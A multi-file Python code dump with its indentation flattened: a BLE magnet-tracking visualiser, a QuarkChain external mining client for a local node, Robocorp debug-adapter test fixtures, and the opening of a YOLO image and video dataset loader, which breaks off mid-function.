XXs = Xs
YYs = Ys
ZZs = Zs
ax.scatter(XXs, YYs, ZZs, c='r', s=1, alpha=0.5)
(magnet_pos,) = ax.plot(t / 100.0 * 5, t / 100.0 * 5, t /
100.0 * 5, linewidth=3, animated=True)
if magcount == 2:
(magnet_pos2,) = ax.plot(t / 100.0 * 5, t / 100.0 * 5, t /
100.0 * 5, linewidth=3, animated=True)
plt.show(block=False)
plt.pause(0.1)
bg = fig.canvas.copy_from_bbox(fig.bbox)
ax.draw_artist(magnet_pos)
fig.canvas.blit(fig.bbox)
# timer = Timer(text=f"frame elapsed time: {{: .5f}}")
while True:
# timer.start()
fig.canvas.restore_region(bg)
# update the artist, neither the canvas state nor the screen have
# changed
# update myresults
if not results.empty():
myresult = results.get()
myresults = np.concatenate(
[myresults, np.array(myresult).reshape(1, -1)])
if myresults.shape[0] > 30:
myresults = myresults[-30:]
x = myresults[:, 0]
y = myresults[:, 1]
z = myresults[:, 2]
xx = x
yy = y
zz = z
magnet_pos.set_xdata(xx)
magnet_pos.set_ydata(yy)
magnet_pos.set_3d_properties(zz, zdir='z')
# re-render the artist, updating the canvas state, but not the screen
ax.draw_artist(magnet_pos)
if magcount == 2:
if not results2.empty():
myresult2 = results2.get()
myresults2 = np.concatenate(
[myresults2, np.array(myresult2).reshape(1, -1)])
if myresults2.shape[0] > 30:
myresults2 = myresults2[-30:]
x = myresults2[:, 0]
y = myresults2[:, 1]
z = myresults2[:, 2]
xx = x
yy = y
zz = z
magnet_pos2.set_xdata(xx)
magnet_pos2.set_ydata(yy)
magnet_pos2.set_3d_properties(zz, zdir='z')
ax.draw_artist(magnet_pos2)
# copy the image to the GUI state, but screen might not changed yet
fig.canvas.blit(fig.bbox)
# flush any pending GUI events, re-painting the screen if needed
fig.canvas.flush_events()
await asyncio.sleep(0)
# timer.stop()
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
global pSensor
global worklist
num = int(pSensor.size/3)
all_data = []
sensors = np.zeros((num, 3))
current = [datetime.datetime.now()]
calibration = np.load('result/calibration.npz')
offset = calibration['offset'].reshape(-1)
scale = calibration['scale'].reshape(-1)
for i in range(num):
sensors[i, 0] = struct.unpack('f', data[12 * i: 12 * i + 4])[0]
sensors[i, 1] = struct.unpack('f', data[12 * i + 4: 12 * i + 8])[0]
sensors[i, 2] = struct.unpack('f', data[12 * i + 8: 12 * i + 12])[0]
# print("Sensor " + str(i+1)+": "+str(sensors[i, 0]) + ", " + str(sensors[i, 1]) + ", " + str(sensors[i, 2]))
current.append(
"(" + str(sensors[i, 0]) + ", " + str(sensors[i, 1]) + ", " +
str(sensors[i, 2]) + ")")
# battery_voltage = struct.unpack('f', data[12 * num: 12 * num + 4])[0]
# print("Battery voltage: " + str(battery_voltage))
sensors = sensors.reshape(-1)
sensors = (sensors - offset) / scale * np.mean(scale)
if len(all_data) > 3:
sensors = (sensors + all_data[-1] + all_data[-2]) / 3
all_data.append(sensors)
worklist.put(sensors)
# print("############")
async def run_ble(address, loop):
async with BleakClient(address, loop=loop) as client:
# wait for BLE client to be connected
x = await client.is_connected()
print("Connected: {0}".format(x))
print("Press Enter to quit...")
# wait for data to be sent from client
await client.start_notify(UART_TX_UUID, notification_handler)
while True:
await asyncio.sleep(0.01)
# data = await client.read_gatt_char(UART_TX_UUID)
async def main(magcount=1):
"""
This is the main entry point for the program
"""
# Address of the BLE device
global ble_address
address = (ble_address)
# Run the tasks
with Timer(text="\nTotal elapsed time: {:.1f}"):
multiprocessing.Process(
target=calculation_parallel, args=(magcount, 1, False)).start()
await asyncio.gather(
asyncio.create_task(run_ble(address, asyncio.get_event_loop())),
asyncio.create_task(show_mag(magcount)),
)
if __name__ == '__main__':
if True:
calibration = Calibrate_Data(cali_path)
[offset, scale] = calibration.cali_result()
if not os.path.exists('result'):
os.makedirs('result')
np.savez('result/calibration.npz', offset=offset, scale=scale)
print(np.mean(scale))
asyncio.run(main(1)) # For tracking 1 magnet
# asyncio.run(main(2)) # For tracking 2 magnet
|
external_miner.py
|
import argparse
import json
import logging
import random
import threading
import time
from typing import Dict, Optional, List, Tuple
import jsonrpcclient
from aioprocessing import AioProcess, AioQueue
from quarkchain.cluster.miner import Miner, MiningWork, MiningResult
from quarkchain.config import ConsensusType
# disable jsonrpcclient verbose logging
logging.getLogger("jsonrpcclient.client.request").setLevel(logging.WARNING)
logging.getLogger("jsonrpcclient.client.response").setLevel(logging.WARNING)
logger = logging.getLogger("quarkchain.tools.external_miner")
logger.setLevel(logging.INFO)
def get_work_rpc(
shard: Optional[int], host: str = "localhost", jrpc_port: int = 38391
) -> MiningWork:
json_rpc_url = "http://{}:{}".format(host, jrpc_port)
header_hash, height, diff = jsonrpcclient.request(
json_rpc_url, "getWork", hex(shard) if shard is not None else None
)
return MiningWork(bytes.fromhex(header_hash[2:]), int(height, 16), int(diff, 16))
def submit_work_rpc(
shard: Optional[int],
res: MiningResult,
host: str = "localhost",
jrpc_port: int = 38391,
) -> bool:
json_rpc_url = "http://{}:{}".format(host, jrpc_port)
success = jsonrpcclient.request(
json_rpc_url,
"submitWork",
hex(shard) if shard is not None else None,
"0x" + res.header_hash.hex(),
hex(res.nonce),
"0x" + res.mixhash.hex(),
)
return success
def repr_shard(shard_id):
return "SHARD %s" % shard_id if shard_id is not None else "ROOT"
class ExternalMiner(threading.Thread):
"""One external miner could handles multiple shards."""
def __init__(self, configs):
super().__init__()
self.configs = configs
self.input_q = AioQueue()
self.output_q = AioQueue()
self.process = None
def run(self):
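        # Two cooperating loops: a background thread polls getWork over JSON-RPC
        # for every configured shard and feeds fresh work to the mining process,
        # while this thread blocks on the output queue and submits results,
        # retrying the submission RPC until it succeeds.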
work_map = {} # type: Dict[bytes, Tuple[MiningWork, int]]
# start the thread to get work
def get_work():
            # work_map: header hash -> (work, shard id)
nonlocal work_map, self
# shard -> work
existing_work = {} # type: Dict[int, MiningWork]
while True:
for config in self.configs:
shard_id = config["shard_id"]
try:
work = get_work_rpc(shard_id)
except Exception:
# ignore network errors and try next one
logger.error("Failed to get work")
continue
# skip duplicate work
if (
shard_id in existing_work
and existing_work[shard_id].hash == work.hash
):
continue
mining_params = {
"consensus_type": config["consensus_type"],
"shard": shard_id,
}
if self.process:
self.input_q.put((work, mining_params))
logger.info(
"Pushed work to %s height %d"
% (repr_shard(shard_id), work.height)
)
else:
# start the process to mine
self.process = AioProcess(
target=Miner.mine_loop,
args=(work, mining_params, self.input_q, self.output_q),
)
self.process.start()
logger.info(
"Started mining process for %s" % repr_shard(shard_id)
)
# bookkeeping
existing_work[shard_id] = work
work_map[work.hash] = (work, shard_id)
# random sleep 1~2 secs
time.sleep(random.uniform(1.0, 2.0))
get_work_thread = threading.Thread(target=get_work)
get_work_thread.start()
# the current thread handles the work submission
while True:
res = self.output_q.get(block=True) # type: MiningResult
work, shard_id = work_map[res.header_hash]
while True:
try:
success = submit_work_rpc(shard_id, res)
break
except Exception:
logger.error("Failed to submit work, backing off...")
time.sleep(0.5)
logger.info(
"Mining result submission result: %s for %s height %d"
% (
"success" if success else "failure",
repr_shard(shard_id),
work.height,
)
)
del work_map[res.header_hash] # clear bookkeeping
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--config",
required=True,
type=str,
help="path to config json file, same as the config running cluster",
)
parser.add_argument("--worker", type=int, help="number of workers", default=8)
args = parser.parse_args()
with open(args.config) as f:
config_json = json.load(f)
worker_configs = [[] for _ in range(args.worker)] # type: List[List[Dict]]
for i, shard_config in enumerate(config_json["QUARKCHAIN"]["SHARD_LIST"]):
config = {
"shard_id": i,
"consensus_type": ConsensusType[shard_config["CONSENSUS_TYPE"]],
}
worker_configs[i % args.worker].append(config)
# FIXME: manually add another worker dedicated for root chain
worker_configs.append(
[
{
"shard_id": None,
"consensus_type": ConsensusType[
config_json["QUARKCHAIN"]["ROOT"]["CONSENSUS_TYPE"]
],
}
]
)
for config_list in worker_configs:
ext_miner = ExternalMiner(config_list)
ext_miner.start()
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
from collections import namedtuple
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Dict, Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
_JsonHit = namedtuple("_JsonHit", "thread_id, frame_id, stack_trace_response")
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robotframework_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOTFRAMEWORK_DAP_LOG_LEVEL"] = "3"
env["ROBOTFRAMEWORK_DAP_LOG_FILENAME"] = dap_log_file
env["PYDEVD_DEBUG_FILE"] = dap_log_file
env["PYDEVD_DEBUG"] = "1"
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
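    """
    Test helper that talks to the debug adapter over the DAP protocol:
    requests are pushed onto write_queue (consumed by the writer thread) and
    responses/events are read back from read_queue.
    """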
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
while True:
msg = self.read_queue.get(timeout=TIMEOUT)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Skip OutputEvent and ConfigurationDoneResponse. Other events must match.
if not isinstance(msg, (OutputEvent, ConfigurationDoneResponse)):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robotframework-lsp-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
self.write(ConfigurationDoneRequest())
def step_in(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInResponse
arguments = StepInArguments(threadId=thread_id)
self.write(StepInRequest(arguments))
self.read(StepInResponse)
def step_next(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextResponse
arguments = NextArguments(threadId=thread_id)
self.write(NextRequest(arguments))
self.read(NextResponse)
def step_out(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutResponse
arguments = StepOutArguments(threadId=thread_id)
self.write(StepOutRequest(arguments))
self.read(StepOutResponse)
def continue_event(self, thread_id, accept_terminated=False):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import TerminatedEvent
arguments = ContinueArguments(thread_id)
self.write(ContinueRequest(arguments))
expected = [ContinueResponse]
if accept_terminated:
expected.append(TerminatedEvent)
return self.read(expect_class=tuple(expected))
def launch(
self,
target,
debug=True,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.basic import as_str
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ProcessEvent
launch_args = LaunchRequestArguments(
__sessionId="some_id", noDebug=not debug, target=target, terminal=terminal
)
if args:
launch_args.kwargs["args"] = args
self.write(LaunchRequest(launch_args))
if terminal == "external":
run_in_terminal_request = self.read(RunInTerminalRequest)
env = os.environ.copy()
for key, val in run_in_terminal_request.arguments.env.to_dict().items():
env[as_str(key)] = as_str(val)
cwd = run_in_terminal_request.arguments.cwd
popen_args = run_in_terminal_request.arguments.args
subprocess.Popen(popen_args, cwd=cwd, env=env)
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
self.read(ProcessEvent)
event = self.read(InitializedEvent)
assert isinstance(event, InitializedEvent)
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines, line_to_kwargs={}):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(
line=line, **line_to_kwargs.get(line, {})
).to_dict()
for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
def get_stack_as_json_hit(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
StackTraceArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StackTraceRequest
stack_trace_request = self.write(
StackTraceRequest(StackTraceArguments(threadId=thread_id))
)
# : :type stack_trace_response: StackTraceResponse
# : :type stack_trace_response_body: StackTraceResponseBody
# : :type stack_frame: StackFrame
stack_trace_response = self.wait_for_response(stack_trace_request)
stack_trace_response_body = stack_trace_response.body
assert len(stack_trace_response_body.stackFrames) > 0
stack_frame = next(iter(stack_trace_response_body.stackFrames))
return _JsonHit(
thread_id=thread_id,
frame_id=stack_frame["id"],
stack_trace_response=stack_trace_response,
)
def wait_for_thread_stopped(
self, reason="breakpoint", line=None, file=None, name=None
):
"""
:param file:
utf-8 bytes encoded file or unicode
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StoppedEvent
stopped_event = self.read(StoppedEvent)
assert stopped_event.body.reason == reason
json_hit = self.get_stack_as_json_hit(stopped_event.body.threadId)
if file is not None:
path = json_hit.stack_trace_response.body.stackFrames[0]["source"]["path"]
if not path.endswith(file):
raise AssertionError("Expected path: %s to end with: %s" % (path, file))
if name is not None:
assert json_hit.stack_trace_response.body.stackFrames[0]["name"] == name
if line is not None:
found_line = json_hit.stack_trace_response.body.stackFrames[0]["line"]
if not isinstance(line, (tuple, list)):
line = [line]
assert found_line in line, "Expect to break at line: %s. Found: %s" % (
line,
found_line,
)
return json_hit
def get_line_index_with_content(self, line_content, filename=None):
"""
        :return: the line index which has the given content (1-based).
"""
if filename is None:
filename = self.target
with open(filename, "r") as stream:
for i_line, line in enumerate(stream):
if line_content in line:
return i_line + 1
raise AssertionError("Did not find: %s in %s" % (line_content, filename))
def get_name_to_scope(self, frame_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Scope
scopes_request = self.write(ScopesRequest(ScopesArguments(frame_id)))
scopes_response = self.wait_for_response(scopes_request)
scopes = scopes_response.body.scopes
name_to_scopes = dict((scope["name"], Scope(**scope)) for scope in scopes)
assert len(scopes) == 3
assert sorted(name_to_scopes.keys()) == ["Arguments", "Builtins", "Variables"]
assert name_to_scopes["Arguments"].presentationHint == "locals"
return name_to_scopes
def get_name_to_var(self, variables_reference):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
variables_response = self.get_variables_response(variables_reference)
return dict(
(variable["name"], Variable(**variable))
for variable in variables_response.body.variables
)
def get_arguments_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Arguments"].variablesReference)
def get_variables_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Variables"].variablesReference)
def get_builtins_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Builtins"].variablesReference)
def get_variables_response(self, variables_reference, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import VariablesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
VariablesArguments,
)
variables_request = self.write(
VariablesRequest(VariablesArguments(variables_reference, format=fmt))
)
variables_response = self.wait_for_response(variables_request)
assert variables_response.success == success
return variables_response
def evaluate(self, expression, frameId=None, context=None, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateArguments
eval_request = self.write(
EvaluateRequest(
EvaluateArguments(
expression, frameId=frameId, context=context, format=fmt
)
)
)
eval_response = self.wait_for_response(eval_request)
assert (
eval_response.success == success
), "Expected success to be: %s (found: %s).\nMessage:\n%s" % (
success,
eval_response.success,
eval_response.to_dict(),
)
return eval_response
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
class RunRobotThread(threading.Thread):
def __init__(self, dap_logs_dir):
threading.Thread.__init__(self)
self.target = None
self.dap_logs_dir = dap_logs_dir
self.result_code = None
self.result_event = threading.Event()
def run(self):
import robot # type: ignore
code = robot.run_cli(
[
"--outputdir=%s" % (self.dap_logs_dir,),
"--listener=robotframework_debug_adapter.listeners.DebugListener",
"--listener=robotframework_debug_adapter.listeners.DebugListenerV2",
self.target,
],
exit=False,
)
self.result_code = code
def run_target(self, target):
self.target = target
self.start()
@pytest.fixture
def robot_thread(dap_logs_dir):
"""
Fixture for interacting with the debugger api through a thread.
"""
t = RunRobotThread(dap_logs_dir)
yield t
dbg_wait_for(
lambda: t.result_code is not None,
msg="Robot execution did not finish properly.",
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
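    # If a debugger (pydevd) is attached, the timeout is effectively disabled so
    # that sitting at a breakpoint does not make the wait fail.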
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
